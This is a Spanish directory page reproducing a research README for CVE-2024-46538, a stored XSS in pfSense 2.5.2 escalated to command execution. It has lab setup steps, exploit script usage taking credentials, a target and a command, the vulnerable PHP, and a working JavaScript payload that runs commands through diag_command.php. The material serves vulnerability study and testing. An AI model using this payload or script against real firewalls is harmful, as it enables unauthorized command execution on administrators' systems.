Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-46538 — Exploit de XSS Almacenado en PfSense que conduce a Ejecución de Código Arbitrario | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2024-46538
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubeqstlab/cve-2024-46538

CVE-2024-46538

Exploit de XSS Almacenado en PfSense que conduce a Ejecución de Código Arbitrario

Ver Repositorio
5181hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Esta publicación es un artículo de investigación publicado por EQSTLab.

Gracias a physicszq, quien descubrió esta vulnerabilidad.

CVE-2024-46538

★ CVE-2024-46538 XSS almacenado en PfSense conduce a PoC de Ejecución de Código Arbitrario ★

https://github.com/user-attachments/assets/f41d0945-b7f4-4f88-bac5-265904256aae

Descripción

CVE-2024-46538 : Vulnerabilidad de XSS almacenado en PfSense

descripción: Una vulnerabilidad de cross-site scripting (XSS) en pfsense v2.5.2 permite a los atacantes ejecutar scripts web arbitrarios o HTML mediante un payload manipulado inyectado en la variable $pconfig en interfaces_groups_edit.php.

Configuración del Laboratorio

Descargar la versión vulnerable (v2.5.2):

Configurar Máquina Virtual

Ejecutándose en Oracle Virtual Box

1. Crear Máquina Virtual alt text

2. Configurar Adaptador 1,2 de la siguiente manera:
alt text
alt text

3. Configurar orden de arranque de la siguiente manera: alt text

4. Siga las instrucciones de la siguiente manera: alt text alt text alt text alt text alt text alt text alt text

Cómo usar

Clonar con Git

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2024-46538.git
cd CVE-2024-46538

Instalar paquetes

root@kitploit:~
pip install -r requirements.txt

Comando

root@kitploit:~
# Store malicious JavaScript payload (No custom js server)
python3 CVE-2024-46538.py -i <USER_ID> -p <USER_PASSWORD> -u <URL_TO_EXPLOIT> -c <CMD_TO_EXECUTE>
# Store malicious JavaScript payload (Use custom js server)
python3 CVE-2024-46538.py -j <CUSTOM_JAVASCRIPT_SERVER> -i <USER_ID> -p <USER_PASSWORD> -u <URL_TO_EXPLOIT> -c <CMD_TO_EXECUTE>

Salida

CVE-2024-46538.py alt text

Análisis

/src/usr/local/www/interfaces_groups_edit.php

root@kitploit:~
if (isset($_POST['members'])) {
		$members = implode(" ", $_POST['members']);
	} else {
		$members = "";
	}
...
		// Create new group
		} else {
			$ifgroupentry['ifname'] = $_POST['ifname'];
			$a_ifgroups[] = $ifgroupentry;
		}

		write_config("Interface Group added");
		interface_group_setup($ifgroupentry);

		header("Location: interfaces_groups.php");
		exit;
	} else {
		$pconfig['descr'] = $_POST['descr'];
		$pconfig['members'] = $members;
	}
}

La falta de filtrado en la variable $pconfig en interfaces_groups_edit.php conduce a una vulnerabilidad de cross-site scripting (XSS). La vulnerabilidad de cross-site scripting (XSS) permite a los atacantes aprovechar el endpoint diag_command.php para ejecutar comandos arbitrarios contra un administrador. Por ejemplo, el siguiente JavaScript puede conducir a la ejecución de código arbitrario.

mal.js

root@kitploit:~
var formData = new FormData();formData.append("__csrf_magic", csrfMagicToken);formData.append("txtCommand", "id");formData.append("txtRecallBuffer", "id");formData.append("submit", "EXEC");formData.append("dlPath", "");formData.append("ulfile", new Blob(), "");formData.append("txtPHPCommand", "");fetch("https://192.168.102.61/diag_command.php", {method: "POST",body: formData}).then(response => response.text()).then(data => {const parser = new DOMParser();const doc = parser.parseFromString(data, "text/html");const contentDiv = doc.querySelector("div.content");if (contentDiv) {alert(contentDiv.textContent);} else {alert("No content found");}})

Escenario

Usuario (Tiene Privilegio: WebCfg - Interfaces: Groups: Edit) --(Almacena Código JavaScript Malicioso)--> Administrador (Tiene Privilegio para ejecutar código) --(Lee interfaces_groups.php)--> Ejecuta Código JavaScript --> Ejecución de Código

Descargo de responsabilidad

Este repositorio no está destinado a ser un exploit XSS para CVE-2024-46538. El propósito de este proyecto es ayudar a las personas a aprender sobre esta vulnerabilidad y, quizás, probar sus propias aplicaciones.

Referencias

https://github.com/physicszq/web_issue/blob/main/pfsense/interfaces_groups_edit_file.md_xss.md

https://skshieldus.com/eng/business/insight.do#

Descargar herramienta